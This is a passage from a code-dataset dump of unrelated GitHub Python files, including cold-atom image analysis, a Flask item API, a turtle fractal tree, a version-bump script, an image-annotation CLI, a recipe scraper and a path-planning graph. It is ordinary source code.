atoms_y:\r\n print(\"atom count calculated along x and along y do NOT match\")\r\n\r\n atoms_x_max = max(atoms_x)\r\n atoms_y_max = max(atoms_y)\r\n atoms_max = max(atoms_x_max, atoms_y_max) \r\n \r\n return atoms_x, atoms_y, atoms_max \r\n # output_array = np.array((number_of_iteration, outputPicsPerIteration, height, width)\r\n\r\n\r\ndef absImaging(images):\r\n iterations, picturesPerIteration, height, width = np.shape(images)\r\n \r\n signal = np.zeros((iterations, 1, height, width))\r\n \r\n if picturesPerIteration==4:\r\n for i in range(iterations-1):\r\n # signal is column density along the imaging path\r\n signal[i,0,:,:] = (images[i,1,:,:] - images[i,3,:,:]) / (images[i,2,:,:] - images[i,3,:,:])\r\n else:\r\n print(\"This spooled series does not have the correct number of exposures per iteration for Absorption Imaging\") \r\n \r\n return signal\r\n\r\n\r\ndef Gaussian(x, a, mu, w0, c):\r\n return a*np.exp(-(x-mu)**2/(2*w0**2)) + c\r\n\r\n\r\n#Gaussian_fit takes an array of the summed atom numbers. It outputs a gaussian width, a full fit report, and an x axis array\r\ndef Gaussian_fit(images, params, slice_array, tof, units_of_tof, dataFolder='.'):\r\n xposition = params.pixel_size*np.linspace(0, len(slice_array),len(slice_array))\r\n aguess = np.max(slice_array)\r\n muguess = params.pixel_size*np.where(slice_array == np.max(slice_array))[0][0]\r\n w0guess = params.pixel_size*len(slice_array)/4 #the standard dev. of the Gaussian\r\n cguess = np.min(slice_array)\r\n paramstemp = Parameters()\r\n paramstemp.add_many(\r\n ('a', aguess,True, None, None, None),\r\n ('mu', muguess, True, None, None, None),\r\n ('w0', w0guess, True, None, None, None),\r\n ('c', cguess, True, None, None, None),\r\n )\r\n \r\n model = lmfit.Model(Gaussian)\r\n result = model.fit(slice_array, x=xposition, params = paramstemp)\r\n gwidth = abs(result.params['w0'].value)\r\n return gwidth, result, xposition\r\n\r\n\r\n#Here I call the Gaussian_fit function on all of the expanding cloud pictures to output widths for all of them.\r\n half_of_pictures = int(params.number_of_pics/2)\r\n gaussian_widths_x = np.zeros(half_of_pictures)\r\n gaussian_widths_y = np.zeros(half_of_pictures)\r\n num_atoms_vs_x, num_atoms_vs_y, atoms_max = temp(slice_array)\r\n \r\n for i in range(half_of_pictures):\r\n fittemp_x = Gaussian_fit(num_atoms_vs_x[2*i+1,:])\r\n fittemp_y = Gaussian_fit(num_atoms_vs_y[2*i+1,:])\r\n gaussian_widths_x[i] = fittemp_x[0]\r\n gaussian_widths_y[i] = fittemp_y[0]\r\n \r\n \r\n if params.ready_to_save == 'true':\r\n \r\n #save Gaussian fit in x direction plot\r\n fit0_x = Gaussian_fit(num_atoms_vs_x[2*i+1,:])\r\n plt.figure()\r\n plt.rcParams.update({'font.size':9})\r\n plt.title('TOF = {}'.format(tof[i])+units_of_tof+' horizontal plot, standard dev. = {}m'.format(round(abs(fit0_x[0]), 5)))\r\n plt.xlabel(\"Position (m)\")\r\n plt.ylabel(\"Number of atoms in MOT\")\r\n plt.plot(fit0_x[2], num_atoms_vs_x[2*i+1,:], 'g.', label='Signal')\r\n plt.plot(fit0_x[2], fit0_x[1].best_fit, 'b', label='Fit')\r\n plt.legend()\r\n plt.tight_layout()\r\n plt.savefig(dataFolder +r'\\TOF = {}'.format(tof[i])+units_of_tof+' horizontal plot.png', dpi = 300)\r\n plt.close() \r\n \r\n #save Gaussian fit in y direction plot\r\n fit0_y = Gaussian_fit(num_atoms_vs_y[2*i+1,:])\r\n plt.figure()\r\n plt.title('TOF = {}'.format(tof[i])+units_of_tof+' vertical plot, standard dev. 
= {}m'.format(round(abs(fit0_y[0]), 5)))\r\n plt.xlabel(\"Position (m)\")\r\n plt.ylabel(\"Number of atoms in MOT\")\r\n plt.plot(fit0_y[2], num_atoms_vs_y[2*i+1,:], 'g.', label='Signal')\r\n plt.plot(fit0_y[2], fit0_y[1].best_fit, 'b', label='Fit')\r\n plt.legend()\r\n plt.tight_layout()\r\n plt.savefig(dataFolder+r'\\TOF = {}'.format(tof[i])+units_of_tof+' vertical plot.png', dpi = 300)\r\n plt.close()\r\n \r\n #save the picture from Andor\r\n plt.figure()\r\n plt.title(\"Signal inside red rectangle\")\r\n plt.imshow(images[2*i+1,params.ymin:params.ymax,params.xmin:params.xmax],cmap=\"gray\", origin=\"lower\",interpolation=\"nearest\",vmin=np.min(images),vmax=np.max(images))\r\n plt.savefig(dataFolder+r'\\TOF = {}'.format(tof[i])+units_of_tof+' signal inside red rectangle.png', dpi = 300)\r\n plt.close()\r\n \r\n\r\n gaussian_widths_x = np.flip(gaussian_widths_x)\r\n gaussian_widths_y = np.flip(gaussian_widths_y)\r\n\r\n\r\n#Here we import the relevant TOF file and combine it with the gaussian widths\r\n widths_tof_x = np.zeros((len(gaussian_widths_x),2))\r\n widths_tof_y = np.zeros((len(gaussian_widths_y),2))\r\n\r\n for i in range(len(gaussian_widths_x)):\r\n widths_tof_x[i] = (gaussian_widths_x[i], tof[i])\r\n widths_tof_y[i] = (gaussian_widths_y[i], tof[i])\r\n\r\n# save the data in a csv file\r\n if params.ready_to_save =='true':\r\n csvfilename_x = dataFolder+r\"\\widths_vs_tof_x.csv\"\r\n csvfilename_y = dataFolder+r\"\\widths_vs_tof_y.csv\"\r\n np.savetxt(csvfilename_x, widths_tof_x, delimiter = \",\") \r\n np.savetxt(csvfilename_y, widths_tof_y, delimiter = \",\") \r\n\r\n\r\ndef find_nearest(array, value):\r\n array = np.asarray(array)\r\n idx = (np.abs(array - value)).argmin()\r\n return array[idx]\r\n\r\ndef exponential(x, m, t, b):\r\n return m * np.exp(-t * x) + b\r\n \r\n# def fit_decay():\r\n \r\n #fit parameters\r\n # value = atom_max*np.exp(-1)\r\n # emin1 = find_nearest(array, value)\r\n # finder = np.where(N_atoms == emin1)\r\n# array_number = int(finder[0])\r\n# #print(\"array_number: \", array_number)\r\n# #######################################This is the time for the function to reach e**-1 of max value\r\n# emin1_time = Picture_Time[array_number]\r\n# atom_fraction = N_atoms/max(N_atoms)\r\n \r\n \r\n \r\n# p0 = (count_spooled.atom_max, 1/emin1_time, 0) # start with values near those we expect\r\n# params, cv = scipy.optimize.curve_fit(exp, Picture_Time, N_atoms, p0)\r\n# m, t, b = params\r\n \r\n# #Quality of fit\r\n# squaredDiffs = np.square(N_atoms - exp(Picture_Time, m, t, b))\r\n# squaredDiffsFromMean = np.square(N_atoms - np.mean(N_atoms))\r\n# rSquared = 1 - np.sum(squaredDiffs) / np.sum(squaredDiffsFromMean)\r\n# print(f\"R² = {rSquared}\")\r\n# print(f\"Y = {m} * e^(-{t} * x) + {b}\")\r\n \r\n# # plot the results\r\n# plt.plot(Picture_Time, N_atoms, '.', label=\"data\")\r\n# plt.plot(Picture_Time, exp(Picture_Time, m, t, b), '--', label=\"fitted\")\r\n# plt.title(\"Fitted Exponential Curve\", fontsize = 18)\r\n# if m < 10**5:\r\n# pressure = t/(6.4*10**7)\r\n# print(\"It appears that this decay occurs in the low density limit.\")\r\n# print(\"Based off of this assumption, the background pressure of the vacuum chamber appears to be {pressure} torr.\")\r\n \r\n \r\n# def fit_load():\r\n# p0 = (atom_max, (1-math.log(math.e-1))/emin1_time, atom_max) # start with values near those we expect\r\n# params, cv = scipy.optimize.curve_fit(exp, Picture_Time, N_atoms, p0)\r\n# m, t, b = params\r\n \r\n# #Quality of fit\r\n# squaredDiffs = np.square(N_atoms - 
exponential(Picture_Time, m, t, b))\r\n# squaredDiffsFromMean = np.square(N_atoms - np.mean(N_atoms))\r\n# rSquared = 1 - np.sum(squaredDiffs) / np.sum(squaredDiffsFromMean)\r\n# print(f\"R² = {rSquared}\")\r\n# print(f\"Y = {m} * e^(-{t} * x) + {b}\")\r\n# # plot the results\r\n# plt.plot(Picture_Time, N_atoms-min(N_atoms), '.', label=\"data\")\r\n# plt.plot(Picture_Time, Load_Decay(Picture_Time, m, t, b)-min(N_atoms), '--', label=\"fitted\")\r\n# plt.title(\"Atoms Loaded Over Time\", fontsize = 20) \r\n\r\nif __name__ == \"__main__\":\r\n #TESTING Script:\r\n\r\n config = LoadConfigFile()\r\n params = ExperimentParams(config, picturesPerIteration=1) \r\n\r\n # CountsToAtoms(params, images[3,4,:,:])\r\n\r\n images = loadSeriesPGM(params, root_filename=\"test\", number_of_pics=3, picturesPerIteration=1, n_params=0, data_folder= \".\") \r\n ShowImages(images) \r\n\r\n \r\n # print(\"Number of iterations=\",params.number_of_iterations)\r\n \r\n # images1 = LoadSpooledSeries(params, data_folder=\"abs img test 1_17\", background_file_name=\"\")\r\n # signal1 = absImaging(images1)\r\n # #atomsPerPixel = CountsToAtoms(params, counts)\r\n \r\n # #ShowImagesTranspose(atomsPerPixel)\r\n \r\n # print(np.shape(images1))\r\n # print(np.shape(signal1))\r\n \r\n # ShowImagesTranspose(images1, False)\r\n \r\n #atomNumbers = ImageTotals(atomsPerPixel)\r\n \r\n #print(atomNumbers)\r\n \r\n #number_of_pics = int(config['Acquisition']['NumberinKineticSeries'])\r\n #print(number_of_pics)\r\n \r\n # images = LoadSpooledSeries(config, data_folder= \".\" , background_file_name= \"spool_background.dat\", picturesPerIteration=3)\r\n # #images = LoadNonSpooledSeries(...)\r\n \r\n # atoms_per_pixel_images = GetCountsFromRawData(images,config)\r\n \r\n # #analyse it somehow:\r\n # #Find the total number of atoms at the end of each iteration\r\n # atom_numbers = GetTotalNumberofAtoms(atoms_per_pixel_images)\r\n \r\n # print(\"Number of atoms in 2nd picture of iteration 0:\",atom_numbers[0][1])\r\n \r\n # #Do a fit:\r\n # result = DoExponentialFit(atom_numbers[:][1])\r\n \r\n # print(np.shape(images))\r\n \r\n \r\n \r\n \r\n\r\n# #here I am making a plot of the first gaussian with the fit for reference\r\n# fit0_x = Gaussian_fit(num_atoms_vs_x[PreviewIndex,:])\r\n# plt.figure()\r\n# plt.rcParams.update({'font.size':9})\r\n# plt.title('Atoms TOF horizontal example plot, standard dev. = {}m'.format(round(fit0_x[0], 5)))\r\n# plt.xlabel(\"Position (m)\")\r\n# plt.ylabel(\"Number of atoms in MOT\")\r\n# plt.plot(fit0_x[2], num_atoms_vs_x[PreviewIndex,:], 'g.', label='Signal')\r\n# plt.plot(fit0_x[2], fit0_x[1].best_fit, 'b', label='Fit')\r\n# # plt.xlim(fit0_x[2][0], fit0_x[2][-1])\r\n# plt.legend()\r\n# plt.tight_layout()\r\n# # plt.savefig(folder_name+r\"\\Horizontal Gaussian Example.png\", dpi = 300)\r\n\r\n# fit0_y = Gaussian_fit(num_atoms_vs_y[PreviewIndex,:])\r\n# plt.figure()\r\n# plt.title('Atoms TOF vertical example plot, standard dev. 
= {}m'.format(round(fit0_y[0], 5)))\r\n# plt.xlabel(\"Position (m)\")\r\n# plt.ylabel(\"Number of atoms in MOT\")\r\n# plt.plot(fit0_y[2], num_atoms_vs_y[PreviewIndex,:], 'g.', label='Signal')\r\n# plt.plot(fit0_y[2], fit0_y[1].best_fit, 'b', label='Fit')\r\n# # plt.xlim(fit0_y[2][0], fit0_y[2][-1])\r\n# plt.legend()\r\n# plt.tight_layout()\r\n# plt.show()\r\n# # plt.savefig(folder_name+r\"\\Vertical Gaussian Example.png\", dpi = 300)\r\n \r\n","repo_name":"insommer/ImageAnalysis","sub_path":"ImageAnalysisCode.py","file_name":"ImageAnalysisCode.py","file_ext":"py","file_size_in_byte":30841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18896762009","text":"from flask import Flask, request\nfrom flask_restful import Resource, Api, reqparse\nfrom flask_jwt import JWT, jwt_required\n\n\napp = Flask(__name__)\napi = Api(app)\n\nitems = []\n\nclass Item(Resource):\n #HTTP Request parser\n parser = reqparse.RequestParser()\n parser.add_argument(\"price\",\n type = float,\n required = True,\n help=\"Please provide price information\"\n )\n #GET /item/\n def get(self, name):\n #Filter the item list with given name, return None if it is not found.\n item = next(filter(lambda x: x[\"name\"] == name, items), None)\n\n #Return the item with code 200 if item exist. Else return 404\n return {\"Item\": item}, 200 if item else 404\n\n #POST /item/\n def post(self, name):\n #Filtering the list to raise error if item already exist.\n #if filter not returns None execute the if block. Same thing as filter.... is not none.\n if next(filter(lambda x: x[\"name\"] == name, items), None):\n return {\"message\": \"An item with name '{}' already exist.\".format(name)},400\n\n data = Item.parser.parse_args()\n item = {\"name\":name, \"price\": data[\"price\"]}\n items.append(item)\n return item, 201\n\n #DELETE /item/\n def delete(self, name):\n global items\n items = list(filter(lambda x: x[\"name\"] != name,items))\n return {\"message\": \"item deleted\"}\n\n #PUT /item/\n #Updates price of an item\n def put(self,name):\n data = Item.parser.parse_args()\n item = next(filter(lambda x: x[\"name\"] == name,items),None)\n if item is None:\n item = {\"name\":name, \"price\": data[\"price\"]}\n items.append(item)\n else:\n item.update(data)\n return item\nclass ItemList(Resource):\n #GET /items\n def get(self):\n return {\"items\": items}\n\napi.add_resource(Item, \"/item/\")\napi.add_resource(ItemList, \"/items\")\napp.run(port=5000, debug=True)\n","repo_name":"MutluhanB/ShopAPI","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20696019687","text":"from turtle import *\n\n\ndef tree(plist, l, a, f):\n \"\"\"plist is a list of pens\n l is length of the branch\n a is a half of the angle between 2 branches\n f is factor by which branch is shortened\n \"\"\"\n if l > 5:\n lst = []\n for p in plist:\n p.forward(1)\n q = p.clone()\n p.left(a)\n q.right(a)\n lst.append(p)\n lst.append(q)\n tree(lst, l * f, a, f)\n\n\ndef main():\n t = Turtle()\n t.color(\"green\")\n t.pensize(15)\n t.hideturtle()\n # FINISHED INITIALIZING\n t.getscreen().tracer(30, 0)\n t.left(90)\n t.penup()\n t.goto(60, 60)\n t.pendown()\n p = tree([t], 110, 65, 
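# args: list of pens, initial branch length, half-angle between branches, and\n    # (below) the factor by which branches shorten at each level\n    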
0.6375)\n\n\nmain()\n","repo_name":"XuhuaHuang/LearnPython","sub_path":"Demonstration/draw_tree.py","file_name":"draw_tree.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7159439343","text":"import argparse, xml.etree.ElementTree as ET\n\ndef __bump(filename, old, new, preserve=None):\n lines = []\n with open(filename, 'r') as f:\n for line in f:\n if preserve and not preserve(line.rstrip()):\n line = line.replace(old, new)\n lines.append(line)\n with open(filename, 'w') as f:\n for line in lines:\n f.write(line)\n\ndef __bump_xhtml(filename, old, new):\n __bump(filename, old, new, preserve=lambda s: s.endswith(''))\n\ndef __bump_yaml(filename, old, new):\n __bump(filename, old, new, preserve=lambda s: s.endswith('# hold-version'))\n\ndef pom(old, new):\n __bump_xhtml('pom.xml', old, new)\n\ndef readme(old, new):\n __bump_xhtml('README.md', old, new)\n\ndef docker_compose(old, new):\n __bump_yaml('docker-compose.yml', old, new)\n __bump_yaml('docker-compose.cluster.yml', old, new)\n\ndef helm(old, new):\n __bump_yaml('chart/Chart.yaml', old, new)\n __bump_xhtml('chart/README.md', old, new)\n\nparser = argparse.ArgumentParser(description='Version bumper')\n\npom_tree = ET.parse('pom.xml')\npom_version = pom_tree.find('{http://maven.apache.org/POM/4.0.0}version').text\n\nparser.add_argument('--old', help='Old version. Defaults to parse from pom.xml version field', default=pom_version)\nparser.add_argument('--new', help='New Version')\nargs = parser.parse_args()\n\nif not args.new:\n raise ValueError('missing new version argument')\n\nfor f in [pom, readme, docker_compose, helm]:\n f(args.old, args.new)\n","repo_name":"OneCricketeer/apache-kafka-connect-docker","sub_path":"version-bump.py","file_name":"version-bump.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"61"} +{"seq_id":"74565578114","text":"import argparse\nimport logging\nimport logging.config\nimport os\n\nfrom . import rectangle\nfrom . import extender\nfrom . import print_screen\nfrom . 
import app_core\n\ndef main():\n ac = app_core.AppCore()\n\n # ihl ext -i img.jpg -o example.jpg -t TEXT -a center -s 50\n\n parser = argparse.ArgumentParser(\n description=f\"Image High Lighter\\n\\n{ac.read_extended_help()}\",\n formatter_class=argparse.RawTextHelpFormatter\n )\n\n subparsers = parser.add_subparsers()\n\n rect_parser = subparsers.add_parser('rect', help=\"\"\"\n LMB - draw rectangle\n MMB - crop\n RMB - add text\n \n LMB Double click - add number\n \n TAB - change color\n \n CTRL + 7 - add number to left top rectangle corner\n CTRL + 9 - add number to right top rectangle corner\n CTRL + 1 - add number to left bottom rectangle corner\n CTRL + 3 - add number to right bottom rectangle corner\n \n CTRL + 8 - add note above the rectangle\n CTRL + 2 - add note below the rectangle\n \n CTRL + Plus - increase size of rectangle border line\n CTRL + Minus - decrease size of rectangle border line\n \n ALT + Plus - increase alpha of rectangle background color\n ALT + Minus - - decrease alpha of rectangle background color\n \n SHIFT + Plus - increase font size\n SHIFT + Minus - decrease font size\n \n P - increase the number counter\n M - decrease the number counter\n \n ALT + I - increase alpha background color of number rectangle\n ALT + D - decrease alpha background color of number rectangle\n \n CTRL + O - open new instance of application with selected image\n CTRL + C - copy current image\n CTRL + Z - undo\n \n ESC - close the application\n \"\"\")\n rect_parser.set_defaults(func=rectangle.run)\n rect_parser.add_argument(\"-p\", \"--path\", required=True)\n rect_parser.add_argument(\"-z\", \"--minimize\", action='store_true')\n rect_parser.add_argument(\"-f\", \"--frameless\", action='store_true')\n\n print_screen_parser = subparsers.add_parser('ps')\n print_screen_parser.set_defaults(func=print_screen.run)\n print_screen_parser.add_argument(\"-o\", \"--output\", default=\"./print_screens/%Y.%m.%d_%H-%M-%S.png\")\n print_screen_parser.add_argument(\"-b\", \"--backup\", default=os.path.join(ac.app_directory(), r\"backup/full/%Y.%m.%d/%Y.%m.%d_%H-%M-%S.png\"))\n print_screen_parser.add_argument(\"--backup_directory\", default=os.path.join(ac.app_directory(), r\"backup/original/%Y.%m.%d/\"))\n print_screen_parser.add_argument(\"-r\", \"--rect\", action='store_true')\n print_screen_parser.add_argument(\"-z\", \"--rect_minimize\", action='store_true')\n print_screen_parser.add_argument(\"-f\", \"--rect_frameless\", action='store_true')\n print_screen_parser.add_argument(\"-m\", \"--monitor\", default=2)\n print_screen_parser.add_argument(\"-v\", \"--variables\", default=[], nargs='*')\n\n extender_parser = subparsers.add_parser('ext')\n extender_parser.set_defaults(func=extender.run)\n extender_parser.add_argument(\"-i\", \"--image_path\")\n extender_parser.add_argument(\"-o\", \"--output_path\", default=None, help=\"If it is not set. 
The original image will overwrite.\")\n extender_parser.add_argument(\"-p\", \"--position\", default=\"head\", help=\"foot, head\")\n extender_parser.add_argument(\"-t\", \"--text\", required=True)\n extender_parser.add_argument(\"-a\", \"--text_align\", default=\"center\", help=\"left, center, right\")\n extender_parser.add_argument(\"-c\", \"--text_color\", default=\"#FFFFFF\", help=\"#FFFFFF, FFFFFF\")\n extender_parser.add_argument(\"-b\", \"--background_color\", default=\"#000000\", help=\"#000000\")\n extender_parser.add_argument(\"-f\", \"--font_path\", default=\"FONTS/arial.ttf\", help=\"FONTS/arial.ttf\")\n extender_parser.add_argument(\"-s\", \"--font_size\", default=34, help=\"34\")\n extender_parser.add_argument(\"-v\", \"--vertical_padding\", default=10, help=\"10\")\n extender_parser.add_argument(\"-n\", \"--horizontal_padding\", default=10, help=\"10\")\n\n batch_rect_parser = subparsers.add_parser('bect')\n batch_rect_parser.set_defaults(func=rectangle.run_for_all)\n batch_rect_parser.add_argument(\"-z\", \"--rect_minimize\", action='store_true')\n\n font_test_parser = subparsers.add_parser('font-test')\n font_test_parser.set_defaults(func=extender.run_font_test)\n font_test_parser.add_argument(\"-i\", \"--image_path\")\n font_test_parser.add_argument(\"-d\", \"--fonts_directory\")\n\n arguments = parser.parse_args()\n arguments.func(arguments)\n\n# TODO: Rectangle - CTRL + O\n\n# TODO: Rectangle - Nastaveni tloustky cary\n# TODO: Rectangle - Nastaveni alpha pro vypln ctverce\n# TODO: Rectangle - Nastaveni fontu a velikosti\n# TODO: Rectangle - Hezci okno pro text nebo nazornejsi pridavani textu\n# TODO: Rectangle - Funkce prohlizece v adresari sipky\n# TODO: Rectangle - Pridani a odstraneni head / foot\n# TODO: Rectangle - Frameless ui.setWindowFlags(QtCore.Qt.FramelessWindowHint)\n# TODO: Rectangle - Nastrojova a stavova lista\n# TODO: Rectangle - Crop mimo aktualni view\n# TODO: Rectangle - Hezci scrollbary\n# TODO: Rectangle - Hezci background color\n# TODO: Rectangle - Vyrezat vlozit\n# TODO: Rectangle - Vlozit CTRL + V posunout\n\n# TODO: Cislo v kruhu (ALT + double click LMB)\n# TODO: Vkladani popisu k cislum do paticky obrazku (jeden radek == jeden popis NEBO napocitat kolik se toho vejde na radek)\n\n# TODO: NEJDULEZITESJSI JE REFAKTOR A PRIDANI STAVOVE LISTY\n\n# TODO: Aplikace co posloucha Print Screen key press event\n\n# TODO: extender - pridani podle konfigu [] + variables\n# TODO: extender - hromadne zpracovani podle konfigu, na jednom radku left, center, right\n# TODO: extender - gradient\n# TODO: extender - propracovanejsi extended area\n\n# TODO: Idea backup machine - vytvori zip a ulozi na standardni misto\n\n# https://stackoverflow.com/questions/34697559/pil-image-to-qpixmap-conversion-issue\n# from PIL.ImageQt import ImageQt\n# qim = ImageQt(im)\n# pix = QtGui.QPixmap.fromImage(qim)\n","repo_name":"ShadowCodeCz/ImageHighLighter","sub_path":"ihl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9799407906","text":"import re\nfrom api import cache\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nregex_unit = re.compile('data-quantity-unit-singular=\"(.*?)\"')\nregex_quantity = re.compile('data-quantity=\"(\\d+)\"')\nregex_additional = re.compile('data-additional-info=\"(.*?)\"')\nregex_ingredient = re.compile('data-description-singular=\"(.*?)\"')\nregex_recipe_item_list = re.compile('
regex_recipe_item_list = re.compile('<ul[^>]*>(.*?)</ul>', re.DOTALL)\n# NOTE: the HTML tags inside the following patterns were lost when this file was extracted; generic tag expressions are assumed\nregex_recipe_item = re.compile('<li[^>]*>(.*?)</li>', re.DOTALL)\nregex_preparation_time = re.compile('<[^>]*>\s*(\d+).*?', re.DOTALL)\nregex_name = re.compile('<meta[^>]*content=\"(.*?)\"[^>]*>', re.DOTALL)\nregex_number_persons = re.compile('<[^>]*>
    .*?(\\d+).*?', re.DOTALL)\nregex_recept_url = re.compile('/allerhande/recept/R-R(.*?)/', re.DOTALL)\n\n# data-phone-src=\"https://static.ah.nl/static/recepten/img_088124_890x594_JPG.jpg\"\nregex_picture = re.compile('data-phone-src=\"(.*?)\"', re.DOTALL)\n\n# def get_recipe_ids_from_page(ah_url):\n# response = requests.get(ah_url)\n# if response.status_code != 200:\n# return '', ''\n# matches = regex_recept_url.findall(response.text)\n# matches = list(set(matches))\n# ids = []\n# for match in matches:\n# ids.append('R-R' + match)\n# return ids\n\n\ndef get_recipe_page_html(recipe_id):\n url = 'https://www.ah.nl/allerhande/recept/' + recipe_id\n result = cache.query(url, params={}, headers={}, result_type=cache.ResultType.HTML)\n return result, url\n\n\ndef get_recipe(recipe_id):\n text, url = get_recipe_page_html(recipe_id)\n logger.info(text)\n recipe_items = get_recipe_items(text)\n logger.info(str(recipe_items))\n preparation_time_in_min = get_preparation_time_min(text)\n number_persons = get_number_persons(text)\n name = get_name(text)\n picture_url = get_picture(text)\n recipe = {\n 'name': name,\n 'url': url,\n 'picture_url': picture_url,\n 'recipe_items': recipe_items,\n 'preparation_time_in_min': preparation_time_in_min,\n 'number_persons': number_persons\n }\n return recipe\n\n\ndef get_name(page_html_text):\n matches = regex_name.findall(page_html_text)\n return matches[0]\n\n\ndef get_number_persons(page_html_text):\n matches = regex_number_persons.findall(page_html_text)\n return int(matches[0]) if matches else 1\n\n\ndef get_picture(page_html_text):\n matches = regex_picture.findall(page_html_text)\n return matches[0]\n\n\ndef get_recipe_items(page_html_text):\n matches = regex_recipe_item_list.findall(page_html_text)\n recipe_item_list = matches[0]\n matches = regex_recipe_item.findall(recipe_item_list)\n recipe_items = []\n for match in matches:\n name = ''\n unit = ''\n quantiy = 0\n\n matches = regex_quantity.findall(match)\n if matches:\n quantiy = int(matches[0])\n\n matches = regex_ingredient.findall(match)\n if matches:\n name = matches[0]\n\n matches = regex_unit.findall(match)\n if matches:\n unit = matches[0]\n\n matches = regex_additional.findall(match)\n unit_not_so_good = unit == 'pak' or unit == 'zakken' or unit == 'zak'\n if unit_not_so_good and matches:\n addit = matches[0].split(' ')\n if len(addit) == 2:\n quantiy = int(addit[0])\n unit = addit[1]\n elif len(addit) == 3 and addit[0] == 'a':\n quantiy = int(addit[1])\n unit = addit[2]\n\n recipe_items.append([quantiy, unit, name])\n return recipe_items\n\n\ndef get_preparation_time_min(page_html_text):\n matches = regex_preparation_time.findall(page_html_text)\n try:\n prep_time = int(matches[0])\n except ValueError:\n prep_time = None\n return prep_time\n","repo_name":"mathijsromans/consupedia","sub_path":"api/allerhande_scraper.py","file_name":"allerhande_scraper.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6035955339","text":"from Robot import *\nfrom Map import *\nfrom Obstacle import *\nfrom Node import *\n\nclass VisibilityGraph():\n\n def __init__(self, window, start, goal, obstacles, robot):\n self.Map = Map(obstacles, robot)\n self.window = window\n self.segments = []\n self.nodes ={}\n self.new_nodes = {}\n self.start = Node(window, start, 0)\n self.goal = Node(window, goal, 0)\n for h in xrange(1):\n self.nodes[h] = self.getNodes(h)\n\n for a in xrange(1):\n nodes = self.nodes[a]\n for 
i in xrange(len(nodes)):\n node1 = nodes[i]\n for j in xrange(len(nodes)):\n node2 = nodes[j]\n if not node1.state[0].equal(node2.state[0]):\n s = Segment(self.window, node1.state[0].copy(), node2.state[0].copy())\n if self.Map.isSegLegal(s, a):\n self.segments.append(s)\n node1.addChild(node2)\n #s.draw(\"green\")\n #if can connect to different layer do connect\n '''\n for t in xrange(-60,0):\n if self.Map.pointInCSpace(t,node1.state[0]):\n new_node = Node(self.window,node1.state[0], t)\n node1.addChild(new_node)\n if not self.new_nodes.has_key(t):\n self.new_nodes[t] = [new_node]\n else:\n self.new_nodes[t].append(new_node)\n else:\n break\n print \"done: \" + str(a)\n '''\n '''\n for b in self.new_nodes.keys():\n nodes = self.nodes[b]\n print len(self.new_nodes[b])\n for c in self.new_nodes[b]:\n for j in xrange(len(nodes)):\n node2 = nodes[j]\n if not c.state[0].equal(node2.state[0]):\n s = Segment(self.window, c.state[0].copy(), node2.state[0].copy())\n if self.Map.isSegLegal(s, b):\n self.segments.append(s)\n c.addChild(node2) \n print \"second round: \" + str(b)\n print \"Done with Visibility Graph\"\n '''\n \n \n def getNodes(self,i):\n vertices = self.Map.vertices(i)\n nodes = []\n\n for v in vertices:\n nodes.append(Node(self.window, v, i))\n \n nodes.append(self.start)\n nodes.append(self.goal)\n return nodes\n \n \n\n\n\n","repo_name":"jperezdiaz/6.0S78","sub_path":"pset2/VisibilityGraph.py","file_name":"VisibilityGraph.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23042401771","text":"__author__ = 'Aneesh Neelam '\n\nimport os\n\nimport webapp2\nimport jinja2\n\nimport DataStore\nfrom gaesessions import get_current_session\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n\nclass StaffHandler(webapp2.RequestHandler):\n def get(self):\n \"\"\"\n Get Request handlers for '/staff'\n \"\"\"\n session = get_current_session()\n if session['type'] != \"Staff\":\n self.redirect('/')\n email = session['email']\n duties = {'start_time': 'Not Assigned', 'end_time': 'Not Assigned', 'work': 'Not Assigned'}\n Orders = DataStore.Orders.all()\n Staff = DataStore.Staff.all()\n for duty in Staff:\n if duty.email == email:\n duties = duty\n\n template_values = {\n 'Staff': duties,\n 'Orders': Orders,\n }\n template = JINJA_ENVIRONMENT.get_template('templates/staff.html')\n self.response.write(template.render(template_values))\n\n\n","repo_name":"aneesh-neelam/RestaurantManagementSystem-GAE","sub_path":"StaffHandlers.py","file_name":"StaffHandlers.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16747099561","text":"from memory_profiler import profile\nimport gc\nimport array\n\n\n@profile(precision=8)\ndef readfilemisc():\n with open(\"experiments/sampledata/lipsum-20word.txt\", encoding='utf-8') as f:\n read_n_chars: str = f.read(10) # read n characters\n\n for line in f:\n s:str = line.strip() \n a = [i for i in range(100000)]\n # print(\"size of file obj: \", sys.getsizeof(f))\n b = array.array('i', [i for i in range(100000)])\n \n \n # print(f.closed)\n f.close()\n # 
print(f.closed)\n\n\nreadfilemisc()","repo_name":"adarshjhaa100/distributed-database","sub_path":"experiments/memoryprofilertest.py","file_name":"memoryprofilertest.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
